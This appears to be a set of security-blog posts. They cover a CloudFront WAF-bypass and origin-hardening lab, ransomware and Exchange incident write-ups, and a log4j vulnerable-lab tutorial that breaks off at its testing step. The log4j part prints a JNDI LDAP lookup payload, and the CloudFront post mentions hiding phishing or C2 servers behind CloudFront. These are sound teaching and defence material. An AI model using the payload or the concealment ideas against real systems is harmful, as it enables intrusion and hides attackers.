One of the most common ways of bypassing a Web Application Firewall (WAF) involves finding out the backend servers’ address and connecting to it directly. An IP can be leaked in many ways, including DNS history, HTTP headers, cookies, virtual host routing with shared infrastructure, stack traces leaking source code, successful server-side request forgery attacks, even sometimes you can find it in the JavaScript source map. And assuming you locate the IP you can then directly reach the server and bypass all the protections and logging that a WAF provides.

Very often during engagements, we assess web applications positioned behind AWS CloudFront, which by default is not a WAF but a Content Delivery Network (CDN) designed to speed up the loading time of a website by caching static files and delivering them quickly thanks to the many nodes CloudFront has all over the world. Even though CloudFront by default does not operate as a WAF, it does provide an intuitive way of adding WAF rules which can then be applied on each request passing through the service. More often than not, we see them being used. The rules can either be a managed subscription by a third-party vendor (e.g., F5) or they can be inline, written manually by the application owner.

As AWS does not provide a simple way for developers to limit requests to their web applications (EC2) to be coming only from CloudFront, very often people try to improvise with different ways of enforcing the chain. For example, they use tokensadding a custom HTTP header with a unique value which is sent with all requests from CloudFront and then verified on the web application server. While this is a strict technique relying on a shared secret, there are both security concerns with the secret leaking (when a header is reflected in the response), and it also adds a very large complexity as there must be an additional mechanism that can rotate the secret. Rotation involves changes to AWS resources and to the application logic, not to mention the potential downtime if these actions are not synchronized fully.

A lesser-known technique that AWS has suggested over the years is to restrict access based on an IP address. While this sounds very much like what Cloudflare has as its default recommendation, with CloudFront things are a bit more complicated as AWS does not have a constant strict address pool for this service, but rather they rotate IP addresses frequently — meaning that if you don’t update the firewall immediately when a change occurs, you risk both downtimes as new requests could be coming from a non-approved IP address and attacks from servers/services that now have an IP address which was previously associated with CloudFront.

In this article we will build a lab in which we will 1) create a simple application behind CloudFront, 2) place some WAF rules and demonstrate the weakness, and 3) configure an IP-based restriction that should protect the end system.

Setting up the Environment

For this example, we can create a simple web server in AWS with a public and a private page which we will then try to protect with WAF rules on CloudFront.

Creating the Web Server

The first thing we need to do is create a security group with an inbound “allow all” rule for port 80:

$ aws ec2 create-security-group \
	--group-name ExampleWebsite \
	--description "Example Website for testing CloudFront with WAF rules"
    "GroupId": "sg-0de46ea030c72802c"
$ aws ec2 authorize-security-group-ingress \
	--group-id sg-0de46ea030c72802c \
	--protocol tcp --port 80 --cidr

Next, optionally, we can quickly create an SSH key to use for the new system:

$ aws ec2 create-key-pair \
	--key-name MyKeyPair \
	--query 'KeyMaterial' \
	--output text > MyKeyPair.pem

Finally, we will need a simple bash script to run at build time on the web server:

yum update -y  
yum install -y httpd.x86_64  
systemctl start httpd.service   
echo "This is a public page" > /var/www/html/index.html
echo "secret" > /var/www/html/private.html

With these prerequisites out of the way, now is time to just build the web server:

$ aws ec2 run-instances \
	--image-id ami-0ad97c80f2dfe623b \
	--instance-type t2.nano \
	--user-data file:// \
	--security-group-ids sg-0de46ea030c72802c \
	--key-name MyKeyPair
    "Groups": [],
    "Instances": [{
        "AmiLaunchIndex": 0,
        "ImageId": "ami-0ad97c80f2dfe623b",
        "InstanceId": "i-0af0b1290214d5d95",

A couple of minutes later, it is possible to get the public IP of the system with the following command:

$ aws ec2 describe-instances \
	--instance-ids i-0af0b1290214d5d95 \
	--query 'Reservations[*].Instances[*].PublicIpAddress' \
	--output text

Now is time to check the environment; we can quickly see that the server is up and the pages are there:

$ curl
This is a public page
$ curl

Setting up Route 53

To set up CloudFront, we will need to first create a DNS record for the web server. We already a hosted zone configured in the AWS account which we can use, as shown below:

$ aws route53 list-hosted-zones
    "HostedZones": [{
        "Id": "/hostedzone/Z0520503IHM7MMFXXXXX",
        "Name": "",

To create an A record mapping to the EC2 system, we will need the following create-record.json file:

  "Comment": "Testing creating a record set",
  "Changes": [{
      "Action": "CREATE",
      "ResourceRecordSet": {
        "Name": "",
        "Type": "A",
        "TTL": 300,
        "ResourceRecords": [{
            "Value": ""

Now is just a matter of making the request to Route 53, as shown below:

$ aws route53 change-resource-record-sets \
	--hosted-zone-id "/hostedzone/Z0520503IHM7MMFXXXXX" \
	--change-batch file://create-record.json

A couple of seconds later you can check that the record is active:

$ aws route53 get-change --id C018062338JPC4J7GN2I9
    "ChangeInfo": {
        "Id": "/change/C018062338JPC4J7GN2I9",
        "Status": "INSYNC",
        "SubmittedAt": "2023-04-07T00:50:12.606000+00:00",
        "Comment": "Testing creating a record set"

And we can confirm that the site is still accessible:

$ curl
This is a public page
$ curl

Setting up CloudFront

The next step is to finally create the CloudFront distribution routing traffic to our website. To make the request to AWS we will need the following distribution.json file:

  "CallerReference": "cf-cli-distribution",
  "Comment": "Example Cloudfront Distribution",
  "Origins": {
    "Quantity": 1,
    "Items": [
        "Id": "",
        "DomainName": "",
        "CustomOriginConfig": {
          "HTTPPort": 80,
          "HTTPSPort": 443,
          "OriginProtocolPolicy": "http-only",
          "OriginSslProtocols": {
            "Quantity": 1,
            "Items": [
  "DefaultCacheBehavior": {
    "TargetOriginId": "",
    "ViewerProtocolPolicy": "redirect-to-https",
    "AllowedMethods": {
      "Quantity": 2,
      "Items": [
      "CachedMethods": {
        "Quantity": 2,
        "Items": [
    "CachePolicyId": "4135ea2d-6df8-44a3-9df3-4b5a84be39ad"
  "Enabled": true

And the final command to create it looks as follows:

$ aws cloudfront create-distribution --distribution-config file://distribution.json
    "Location": "",
    "ETag": "E1Y4BASGKG03MO",
    "Distribution": {
        "Id": "E3OSJ4978QOTZ2",
        "ARN": "arn:aws:cloudfront::9536171XXXXX:distribution/E3OSJ4978QOTZ2",
        "Status": "InProgress",
        "LastModifiedTime": "2023-04-07T01:29:11.959000+00:00",
        "InProgressInvalidationBatches": 0,
        "DomainName": "",

A couple of minutes later we can go ahead and check the connection to the site:

$ curl -L
This is a public page
$ curl -L

Adding a WAF Rule to CloudFront

The next task for us is to create a WAF rule which we can use to protect everything going to /private*. The following waf-rule.json file was created for this purpose (note that L3ByaXZhdGU= is /private):

    "Name": "basic-rule",
    "Priority": 0,
    "Statement": {
      "ByteMatchStatement": {
        "SearchString": "L3ByaXZhdGU=",
        "FieldToMatch": {
          "UriPath": {}
        "TextTransformations": [
            "Priority": 0,
            "Type": "NORMALIZE_PATH"
        "PositionalConstraint": "STARTS_WITH"
    "Action": {
      "Block": {}
    "VisibilityConfig": {
      "SampledRequestsEnabled": true,
      "CloudWatchMetricsEnabled": true,
      "MetricName": "basic-rule"

Time to create the rule, where you will notice it is specifically created for CloudFront and the us-east-1 region even though our EC2 instance is in eu-west-2. The reason this is the case is because CloudFront only exists in us-east-1 and the WAF rule(s) have to be in the same region, whereas because CloudFront maps to an external IP address, there is no strict requirement for the EC2 system to be in the same region.

$ aws wafv2 create-web-acl \
    --name TestWebAcl \
    --scope CLOUDFRONT \
    --default-action Allow={} \
    --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=TestWebAclMetrics \
    --rules file://waf-rule.json \
    --region us-east-1
    "Summary": {
        "Name": "TestWebAcl",
        "Id": "74941941-24b9-4b1e-b0c0-276a653aad85",
        "Description": "",
        "LockToken": "ba596cac-bdc8-490f-af7c-1f4734c720f3",
        "ARN": "arn:aws:wafv2:us-east-1:9536171XXXXX:global/webacl/TestWebAcl/74941941-24b9-4b1e-b0c0-276a653aad85"

While the intuitive step at this moment would be to use aws wafv2 associate-web-acl this would not work. Applying WAF rules to CloudFront requires making updates to the configuration, rather than simply associating the rule. To make things even harder, AWS does not allow you to simply send an update with only the particular values you want to change, but rather you will need to download the configuration patch it and submit it again.

To Download the configuration file we can use the following command:

$ aws cloudfront get-distribution-config \
	--id E3OSJ4978QOTZ2 \
	--query "DistributionConfig" \
	--output json > current-distribution.json

Next we can patch the WebACLId value to list the rule we want to be applied:

sed '/WebACLId/c\"WebACLId\":\"arn:aws:wafv2:us-east-1:9536171XXXXX:global/webacl/TestWebAcl/74941941-24b9-4b1e-b0c0-276a653aad85\",' current-distribution.json > updated-distribution.json

Finally, we can make an update request, where you will notice we not only are passing the DistributionId, but also the ETag we received when we created the distribution.

$ aws cloudfront update-distribution \
	--id E3OSJ4978QOTZ2 \
	--distribution-config file://updated-distribution.json \
	--if-match E1Y4BASGKG03MO
    "ETag": "E2JUPVIBC3V15H",
    "Distribution": {
        "Id": "E3OSJ4978QOTZ2",
        "ARN": "arn:aws:cloudfront::9536171XXXXX:distribution/E3OSJ4978QOTZ2",
        "Status": "InProgress",
        "LastModifiedTime": "2023-04-07T02:26:50.622000+00:00",
        "InProgressInvalidationBatches": 0,
        "DomainName": "",

To make sure the rule is applied we can check the access to the pages:

$ curl
This is a public page
$ curl 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
Generated by cloudfront (CloudFront)
Request ID: QGJDmdNqJJ6_zS3ALUczF-8NrM-HDKqTzNu-CZoppz6bi3nWv_cSIw==

Strengthening the Environment

At this point, you will be right to notice that direct requests to would still be successful because in this case the WAF would not be applied. The traffic wouldn’t be passing through it but directly to the server.

Creating a Custom Lambda

To handle this, we can follow the recommendation from AWS and create our own Lambda function that pulls the latest list of IP addresses associated with CloudFront and updates the rules on the security group attached to our web server. In effect that would prevent unauthorized traffic and enforce a chain.

The Lambda will need to have the following file:

import os
import json
import boto3
import urllib.request
import hashlib

INGRESS_PORTS    = [80] # but may as well be [80, 443] or just [443]
VPC_ID           = 'vpc-032a791ded3139c0b' # change me
SECURITYGROUP_ID = 'sg-0de46ea030c72802c'  # change me
REGION           = 'eu-west-2'             # change me

ec2_client = boto3.client('ec2', region_name=REGION)
ec2_resource = boto3.resource('ec2', region_name=REGION)

def lambda_handler(event, context):
    # SNS message notification event when the ip ranges document is rotated
    message = json.loads(event['Records'][0]['Sns']['Message'])
    response = urllib.request.urlopen(message['url'])
    ip_ranges = json.loads(

    cf_ranges = []
    for prefix in ip_ranges['prefixes']:
        if prefix['service'] == 'CLOUDFRONT':

    rangeToUpdate = ec2_client.describe_security_groups(
        GroupIds = [ SECURITYGROUP_ID ]
    for sg in rangeToUpdate['SecurityGroups']:
        sgo = ec2_resource.SecurityGroup(sg['GroupId'])
        if len(sgo.ip_permissions) > 0:
        for each_proto in INGRESS_PORTS:
            add_params = {
                'ToPort': int(each_proto),
                'FromPort': int(each_proto),
                'IpRanges': [{ 'CidrIp': range } for range in cf_ranges],
                'IpProtocol': 'tcp'

But before we can go ahead and create the Lambda function, we will need to 1) create a policy with the necessary permissions, and 2) a role we can attach the policy to.

Starting with the IAM policy, we will need the following lambdarole.json file:

Disclaimer: It is recommended to break down the policy into smaller statements and be specific about which resources it should apply to. This is a simple proof-of-concept.

  "Version": "2012-10-17",
  "Statement": [
      "Sid": "CloudWatchPermissions",
      "Effect": "Allow",
      "Action": [
      "Resource": "arn:aws:logs:*:*:*"
      "Sid": "EC2Permissions",
      "Effect": "Allow",
      "Action": [
      "Resource": "arn:aws:ec2:*:*:*"

The policy creation can be done with the following command:

$ aws iam create-policy \
	--policy-name LambdaPolicy \
	--policy-document file://lambdarole.json
    "Policy": {
        "PolicyName": "LambdaPolicy",
        "PolicyId": "ANPA54CACFZZNFOYOE5ZW",
        "Arn": "arn:aws:iam::9536171XXXXX:policy/LambdaPolicy",

Next, we will need to create a Lambda-based IAM role and then attach to it the policy we just created. For the role we will need the following basepolicy.json file:

  "Version": "2012-10-17",
  "Statement": {
    "Effect": "Allow",
    "Principal": {
      "Service": ""
    "Action": "sts:AssumeRole"

The commands needed to create the role and attach the policy look as follows:

$ aws iam create-role \
	--role-name LambdaExecutionRole \
	--assume-role-policy-document  file://basepolicy.json
    "Role": {
        "Path": "/",
        "RoleName": "LambdaRole",
        "RoleId": "AROA54CACFZZMTBSYMFCL",
        "Arn": "arn:aws:iam::9536171XXXXX:role/LambdaRole",
$ aws iam attach-role-policy \
	--role-name LambdaRole \
	--policy-arn "arn:aws:iam::9536171XXXXX:policy/LambdaPolicy"

Finally, we can archive the Lambda function we wrote and upload it to AWS:

$ zip
$ aws lambda create-function \
	--function-name UpdatingSGForCloudFront \
	--runtime python3.9 \
	--zip-file fileb:// \
	--handler lambda_function.lambda_handler \
	--role arn:aws:iam::9536171XXXXX:role/LambdaExecutionRole \
	--region eu-west-2
    "FunctionName": "UpdatingSGForCloudFront",
    "FunctionArn": "arn:aws:lambda:eu-west-2:9536171XXXXX:function:UpdatingSGForCloudFront",

Testing the Lambda Function

Before we can test the Lambda function it is important to note that on average there are around 145-6 IP addresses associated with CloudFront, and because we will need to list each one of these IPs as a separate rule in the security group, we will hit the default quota on AWS for the number of Inbound or outbound rules per security group. So, it is important before we move forward to increase our quota with the following command:

$ aws service-quotas request-service-quota-increase \
    --service-code vpc \
    --quota-code L-0EA8095F \
    --desired-value 160

Keep in mind that the previous command could take an hour (or even more) to go into effect. But once ready, we can then use test input (file lambdatestinput.json) to run the command and see how it will behave. You will notice that this input appears to be an SNS event message, which is intentional. AWS has a public SNS topic that they use to notify whenever there is a change with the IP address association, so at the very end of our setup, we will subscribe to it, but before that, we will use it as test input:

  "Records": [
      "EventVersion": "1.0",
      "EventSubscriptionArn": "arn:aws:sns:EXAMPLE",
      "EventSource": "aws:sns",
      "Sns": {
        "SignatureVersion": "1",
        "Timestamp": "1970-01-01T00:00:00.000Z",
        "Signature": "EXAMPLE",
        "SigningCertUrl": "EXAMPLE",
        "MessageId": "95df01b4-ee98-5cb9-9903-4c221d41eb5e",
        "Message": "{\"create-time\": \"yyyy-mm-ddThh:mm:ss+00:00\", \"synctoken\": \"0123456789\", \"md5\": \"7fd59f5c7f5cf643036cbd4443ad3e4b\", \"url\": \"\"}",
        "Type": "Notification",
        "UnsubscribeUrl": "EXAMPLE",
        "TopicArn": "arn:aws:sns:EXAMPLE",
        "Subject": "TestInvoke"

To invoke the Lambda function with the test input we can use the following command:

$ aws lambda invoke \
	--function-name UpdatingSGForCloudFront \
	--payload fileb://lambdatestinput.json \
    "StatusCode": 200,
    "ExecutedVersion": "$LATEST"
$ cat outputfile.txt 

And to verify that indeed the rules have been created, we can check how many rules our security group now has:

$ aws ec2 describe-security-group-rules \
	--filter Name="group-id",Values="sg-0de46ea030c72802c" | \
	jq -r '.SecurityGroupRules | length'

The final check is to confirm that we can’t reach the EC2 instance directly:

$ curl --connect-timeout 2
curl: (28) Failed to connect to port 80 after 2001 ms: Timeout was reached

Subscribing to the Relevant SNS Topic

To ensure resilience and constant synchronization with the changes to the IP address space of CloudFront we can subscribe to the AmazonIpSpaceChanged public SNS topic and leave it alone.

$ aws sns subscribe \
	--topic-arn "arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged" \
	--region us-east-1 \
	--protocol lambda \
	--notification-endpoint "arn:aws:lambda:eu-west-2:9536171XXXXX:function:UpdatingSGForCloudFront"
$ aws lambda add-permission \
	--function-name "arn:aws:lambda:eu-west-2:9536171XXXXX:function:UpdatingSGForCloudFront" \
	--statement-id lambda-sns-trigger \
	--region eu-west-2 \
	--action lambda:InvokeFunction \
	--principal \
	--source-arn "arn:aws:sns:us-east-1:806199016981:AmazonIpSpaceChanged"


In this article, we demonstrated how we can create a strict firewall that only allows traffic to an EC2 instance from CloudFront and would avoid the risk of an attacker discovering the web server’s public IP address and reaching it directly. We also implemented an automated script that can immediately update the IP addresses in the firewall and keep them up to date.

By all means, the technique used in this blog could be applied in many different ways:

  • The IP address included in the SNS body (re: lists the IP addresses of all services in AWS and could also be useful in case you want to restrict access based on a different service, such as ELB, Lambda, etc.
  • The concept of hiding an EC2 instance behind an AWS service has many offensive use cases. For example, hiding phishing infrastructure or C2 infrastructure from being publicly exposed.

Hopefully, this article can help you better attack and defend systems behind CloudFront.

The article was written by @saldat0

The mechanics of remote work are not as black and white as most people realise. Of course, amidst the pandemic crisis, many companies have undertaken a significant transformation and embraced increased working-from-home (WFH). While there are positives associated with this, such as working hours flexibility, reduced stress levels and improved work-life balance, it has also led to the creation of a wave of new cybersecurity threats.

Analysis shows that remote staff are at an even higher risk than employees working from the office. As a result of unmonitored (and often less secure) home networks, the practice of using personal, non-managed devices for accessing business resources, and the lack of physical security that one could normally expect in an office building, cybercriminals now have an even larger attack surface that they can utilise when attempting to compromise an organisation.


Although there is a constant movement around the ongoing cyber threats, ransomware and phishing campaigns have continued to be the predominant risks for organizations. With increased attack surfaces and the limited oversight that corporations have over their remote workers, it is increasingly difficult for organisations to protect themselves. 

At the start of the global workforce shift, a number of remote employees were less familiar with the concept of phishing campaigns leading to the compromise of entire corporations. And it shouldn’t come as a surprise that there continue to be employees with a high propensity when it comes to interacting with phishing emails.

Security Products

Contrary to common perception, cybersecurity improvements do not necessarily hinder productivity standards. Instead, some solutions can be an almost transparent step in an otherwise simple process. For example, Single Sign-On authentication combined with Two-Factor authentication can serve a critical role for an organisation’s security by creating a strong layer of protection and ensuring thorough access control, all without intruding into the usability.

With that in mind, it is crucial to understand for organisations that cyber threats are an ongoing challenge that requires constant attention, with no one-time solution or a piece of software that fits all situations.

Awareness & Training

It may seem obvious, but more companies need to prioritise workshops and training sessions as it continues to be the best way to address cybersecurity risks and ensure employees working from home understand the cause-and-effect of various attacks. 

Training employees to identify a phishing email is crucial. Fortunately, in 2021 more and more organisations are investing in integrated and robust security solutions.  These often specialise in detection, prevention, and even mitigation of ransomware and other cybersecurity threats. 


As cybercrime continues to evolve, it is pertinent for organisations and their staff to establish a culture of understanding and respecting fundamental cybersecurity issues. For instance, employees should be able to run basic security health checks on their personal devices and it should become a new standard for companies that intend to continue the WFH model. 

There are more than enough software solutions, tools, and strategies available for companies to improve their security posture and help them adapt. Setting basic security parameters and goals is the right step for organisations to improve their security status against common cybersecurity threats.

On January 2021, a major attack on Microsoft took place that leveraged the business email program. By March, the attack spiralled out of control and became a global cybersecurity issue in which threat actors managed to infect thousands of companies.

First Report and Condemnation of the Cyber Attack

Volexity had first reported that attackers were actively exploiting a vulnerability in the Microsoft Exchange email server on January 6th. Unfortunately, this was the time when the US Capitol riot became the focus of the media, diverting attention away from the major finding. The Biden administration has since been openly claiming Chinese involvement in the Exchange hack that compromised thousands of computers systems.

Following this statement, Microsoft affirmed that the alleged Chinese cyberattack has had many victims throughout the world, with most affected being small and medium-sized businesses.

The Impact on Organizations

The aggressive cyberattack stole emails from over 30,000 servers in the U.S. According to Bloomberg, however, the real number of affected businesses could be as high as 60,000. The alleged Chinese espionage hacking group successfully managed to exploit four flaws in Exchange, which allowed them full Remote Command Execution (RCE) to the affected systems.

Hafnium, the Chinese hacking group believed to be behind the attack, used a web of Virtual Private Servers in the U.S. to conceal its original location. In the past, the group has targeted businesses, defence contractors, researchers, and non-profit organizations.

Extent of Exploitation

The Microsoft Exchange hack is similar to the WannaCry Ransomware attack in 2017. Microsoft highlights that DearCry/DoejoCrypt, a ransomware variant, is exploiting the system bugs to set up ransomware on any vulnerable Exchange servers.

Technically, the deployment of China Chopper web shells on compromised Exchange servers has become a common attack strategy. So, if a batch file was successfully written to the infected ransomware servers, hackers would gain access to vulnerable systems.

Microsoft notes that the batch file conducts a SAM (Security Account Manager) database backup. Once the security system registry hives, hackers can access passwords of system users in the registry’s Local Security Authority portion, in turn allowing them to connect to the organization impersonating a valid user.

Released Patches

In April, Microsoft finally rolled out the release of its official security updates for business products. Since then, however, there have been many unscheduled releases to fix Exchange bugs. In fact, Microsoft views Exchange bugs as serious issues. Microsoft tackled 114 CVEs relating to Exchange out of which 19 were critical. Specifically, CVE-2021-28481 and CVE-2021-28480 were the two RCE that NSA reported.

Throughout the cybersecurity crisis, Microsoft collaborated with CISA (Cybersecurity & Infrastructure Security Agency), security companies, and other U.S. agencies to guide businesses on how to minimise the impact of the Exchange hack.

Final Thoughts

Although officials profess that the cybersecurity crisis is serious, businesses can still mitigate the damage through fixable patches. The silver lining is that Microsoft assures businesses that its cloud email system is not affected.

Almost half of all U.S. fuel is transported by the Colonial Pipeline, who were a victim of a ransomware attack and forced to cease operation on 8 May, once again spreading tension within businesses who see increasingly frequent attacks. 

The Colonial Pipeline announced its breach on 7 May and has since commenced an internal investigation into the impact and the cause of this incident.

What Happened?

As part of a double extortion scheme, hackers stole approximately 100 GB of sensitive data on 6 May, after which they threatened to publish this online. According to Bloomberg, the company proactively shut down certain systems to contain the threat, resulting in a temporary halt to pipeline operations and additional system issues.

Joe Blount, the CEO of Colonial Pipeline, stated on 8 June that he paid hackers a ransom of $4.4 million a day after discovering malware on the company’s systems. To negotiate with the hackers, the company hired outside consultants who made the payment in bitcoin. Shortly following the testimony, the FBI announced it had recovered $2.3 million from the Darkside ransomware.

Colonial Pipeline reported on 10th May that the remediation process is ongoing and that each system is being fixed incrementally.

Vulnerability Disclosure & How Hackers Exploited It?

To this day, it is still unclear how the hackers got access to the internal infrastructure and what were the initial attack vectors. It may have included an older, unpatched vulnerability in the system, a phishing email that enticed an employee within the company, or the discovery and use of valid user credentials by the hackers. There are multiple possibilities, but none of these have yet been confirmed yet.

It should be noted that Darkside targeted the business activities rather than operational systems, suggesting their intention was not just to bring down the pipeline but to make a financial profit by targeting much more sensitive data.

Known as a ransomware-as-a-service (RaaS), Darkside is said to have leaked data related to at least 91 organisations since it began operations in 2020. Partner organisations are recruited to expand the criminal enterprise by infiltrating corporate networks and spreading ransomware, while the core developers are responsible for maintaining malware and payment systems.

The Darkside uses very stealthy methods that are difficult to track, hence there is no definite attack vector found to prove the pathway that they used to target the Colonial Pipeline. 

Who was affected?

The attack caused serious damage to the company, but the most affected ones are the consumers. As a result of supply shortage concerns, gasoline futures reached their highest level in three years at the time of the attack. There has been an increase in demand, but drivers are advised not to panic-buy since this could cause prices to rise even further.

Colonial Pipeline was forced to manage additional lateral supply systems manually with road driven oil tankers, first to those areas that had no fuel delivery service or were experiencing severe shortages.


The Colonial Pipeline ransomware attack was carried out by a hackers group named Darkside who used an unknown initial attack vector to install and spread ransomware within the organisation. The CEO of Colonial Pipelines secretly paid the ransom, but the FBI recovered part of the sent money.

One of the burgeoning threats within the IT industry in the UK is Ransomware attacks. These attacks have been affecting numerous organisations and businesses in the UK for several years, with significant increases in frequency during the COVID-19 pandemic.

Ransomware is a type of malicious software used by cybercriminals to encrypt files and documents within a computer system into unreadable data. As a result, the admins and the owners of the files will not be allowed to access their information. The cybercriminals will then demand ransom money from the victims to restore access.

Latest Ransomware Attacks faced by the UK

Analyzing the statistics provided by the UK Department for Digital, Culture, Media, and Sport, 8% of the UK organisations and businesses have encountered ransomware attacks during the past 12 months.

One of the most recent attacks was against the ticket machines of the UK government-run train operator, Northern Trains, where an attack was carried out against more than 600 servers operating the digital ticket self-service counters. While the systems were made unresponsive, forcing the operators to turn them off, customer and payment data were not compromised as a result of this attack.

Furthermore, the National Cyber Security Centre (NCSC) has identified an increase in the number of ransomware attacks against the education institutions such as schools, colleges, and universities in the UK. The concerning trend has been observed during August and September 2020, and then again in February 2021. The effects have caused loss and destruction of students’ coursework, school monetary documents, and other sensitive information. The Newcastle University of UK has faced a serious ransomware attack that disrupted its systems. After the cybercriminals successfully stole sensitive data, they published 750Kb of it and put this for sale on their online website as a proof. Similarly, a ransomware attack on South and City College in Birmingham has deactivated most of their central systems, causing widespread disruption.

Very recently a British retailer Furniture Village, the largest independent furniture retailer in the UK, was attacked with ransomware. The campaign resulted in serious distress for their customers. The company removed the affected systems in an attempt to reduce the scope of the attack and declared that there was no evidence that the private data of its customers or employees had been compromised. 

The reasons behind Ransomware Attacks in the UK

Due to the increase in remote communication because of the COVID-19 pandemic, phishing emails have continued to be one of the most common ways for delivering ransomware payloads to computer systems. In addition, cybercriminals have also found ways to target organizations via remote desktop protocol (RDP) and virtual private networks (VPN) as they sometimes utilise insecure passwords and very rarely employ multi-factor authentication (MFA). There have also been cases linked to unpatched weaknesses in internet-exposed software. 

Most commonly, cybercriminals send ransomware via a phishing email, which entices victims to open a malicious file or click on a link to a website that eventually downloads malware on their computer. Attackers can sometimes discover valid user credentials via public credential dumps or by harvesting credentials from phishing attacks (asking the users to enter their credentials in a fake portal under a convincing pretext). In addition, brute force, or more precisely password spraying attacks, can also be used to identify user credentials due to weak password policies. 

RDP misconfigurations and VPN vulnerabilities have also opened the pathway for cybercriminals to attack computer systems remotely, without targeting users. Since 2019, numerous weaknesses have been found in VPN appliances such as Citrix, Fortinet, Pulse Secure, and Palo Alto. Ransomware actors have used these weaknesses to obtain initial access to internal computer systems within the organization.

To secure the computer systems against ransomware attacks, it is important to ensure that an up-to-date antivirus or an Endpoint Detection and Response (EDR) product has been installed. Victims of ransomware attacks can either pay out the ransom and settle it, attempt to decrypt their data by themselves, or remove the affected computer systems from the network in a hope that the ransomware has not propagated. 

Due to the commonness of ransomware attacks, the best practice for UK organizations is to follow NCSC’s mitigating malware and ransomware guidance. This will assist organizations to protect their computer systems against ransomware attacks.

With its widespread adoption rate and the challenge enterprises face with tracking down where it is being used, log4j would likely continue to be a relevant attack vector for quite a long time. Because of this, we decided to showcase how one would go about building a local lab that could be used both for developing and testing an exploit, as well as help to confirm and adapt remedial actions.

For background, whenever we refer to the Apache log4j vulnerability, we mean the following CVEs:

1. Building the Vulnerable Server

Due to the many conditions and elements included in this vulnerability, which significantly influence the impact and the possible steps for remediation, we found that to be able to test and obtain realistic results that can then confidently be relied on, we had to be very precise when setting up the environment. For example, the version of JDK, the version of log4j, the operating system, the running DNS resolver services, the log4j configuration file, the Java configuration file, the environment variables, as well as what other libraries are being included in the application can all make the exploitation and patching of this issue slightly different.

And because of this, it is important to make sure that all the software matches the one of the target application. To that end, in this article, you will see that we pay particular attention not only to the version of log4j but also to Java as it also plays an important role in the exploit.

We will cover three different ways of building a vulnerable server:

Docker Container

Start right away with Docker, which is by far the easiest to set up. OpenJDK (an open-source implementation of the Java Platform, Standard Edition) offers all the versions of Java that you may need; ready to be downloaded and used.

Keep in mind that JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false meaning JNDI cannot load remote code using LDAP. However, the vulnerability is still exploitable using other methods, such as beanfactory.

In the example below you will see how easy it is to download JDK 8u171 and jump right into it:

Linux Virtual Machine

Alternatively, if you prefer to set up the testing environment directly on a Linux server, it is still relatively easy. You can go to the Java SE archive and select the version of Java that you need (we recommend the tar.gz format).

Once the version is downloaded, it is just a matter of extracting the archive, as shown below:

user@ubuntu:~/poc$ ll -Ah
total 183M
-rw-rw-r-- 1 user user 183M Dec 20 02:13 jdk-8u171-linux-x64.tar.gz

user@ubuntu:~/poc$ tar zxvf jdk-8u171-linux-x64.tar.gz

user@ubuntu:~/poc$ ll -Ah
total 183M
drwxr-xr-x 8 user user 4.0K Mar 28  2018 jdk1.8.0_171/
-rw-rw-r-- 1 user user 183M Dec 20 02:13 jdk-8u171-linux-x64.tar.gz

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -version
java version "1.8.0_171"
Java(TM) SE Runtime Environment (build 1.8.0_171-b11)
Java HotSpot(TM) 64-Bit Server VM (build 25.171-b11, mixed mode)

Windows Virtual Machine

Unlike the previous two options, downloading Java on Windows system without actually installing it, is slightly more involved. It all starts the same way: by downloading the wanted version of Java from the Java SE archive, but then rather than installing it we will have to do a few steps.

As initially described by Igor on Stack Overflow:

Step 1: Download and install 7zip

Step 2: Unarchive the executable “jdk-XuXX-windows-x64.exe” with 7zip, as shown below:

Step 3: Run extrac32 111 within the .rsrc\1033\JAVA_CAB10 folder, as shown below:

Step 4: Extract the “” archive in the same folder using 7zip

Step 5: Run for /r %x in (*.pack) do .\bin\unpack200 -r "%x" "%~dx%~px%~nx.jar" within the newly created “tools” folder, as shown below:

Step 6: Recursively copy the contents of the “tools” folder to a location where JDK would be located; in the screenshot below the new folder would be C:\jdk-8u171.

Step7: Verify that Java has been installed successfully:

2. Building the Vulnerable Application

With a working server, the next step would be to download the version of log4j that would be used for testing. This could be achieved by downloading the (tar.gz or zip) library from Apache’s archive.

In our case, that was version 2.14.1 of log4j, as shown below:

user@ubuntu:~/poc$ wget -q
user@ubuntu:~/poc$ tar zxf apache-log4j-2.14.1-bin.tar.gz 
user@ubuntu:~/poc$ ls -l apache-log4j-2.14.1-bin/log4j-{api,core}-2.14.1.jar
-rw-r--r-- 1 user user  300364 Mar  6  2021 apache-log4j-2.14.1-bin/log4j-api-2.14.1.jar
-rw-r--r-- 1 user user 1745701 Mar  6  2021 apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar

Once that is completed, the next step is to either recreate the application you are targeting, or a simple dummy one where you can work on the attack. A short piece of code that would be able to invoke the vulnerability has been included below:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class POC {
    public static void main(String[] args) {
        Logger logger = LogManager.getLogger(POC.class);

To compile the script, it is important to include both the “core” and the “api” libraries:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/javac -cp apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar:apache-log4j-2.14.1-bin/log4j-api-2.14.1.jar

To run the script, it is once again required to include both libraries as well as the current folder:

user@ubuntu:~/poc$ ./jdk1.8.0_171/bin/java -cp apache-log4j-2.14.1-bin/log4j-core-2.14.1.jar:apache-log4j-2.14.1-bin/log4j-api-2.14.1.jar:. POC
14:27:56.562 [main] ERROR POC - ${jndi:ldap://}

Note that the vulnerable application hangs once executed, as an LDAP request is being made in the background and it will need to timeout.

3. Testing the Proof-Of-Concept

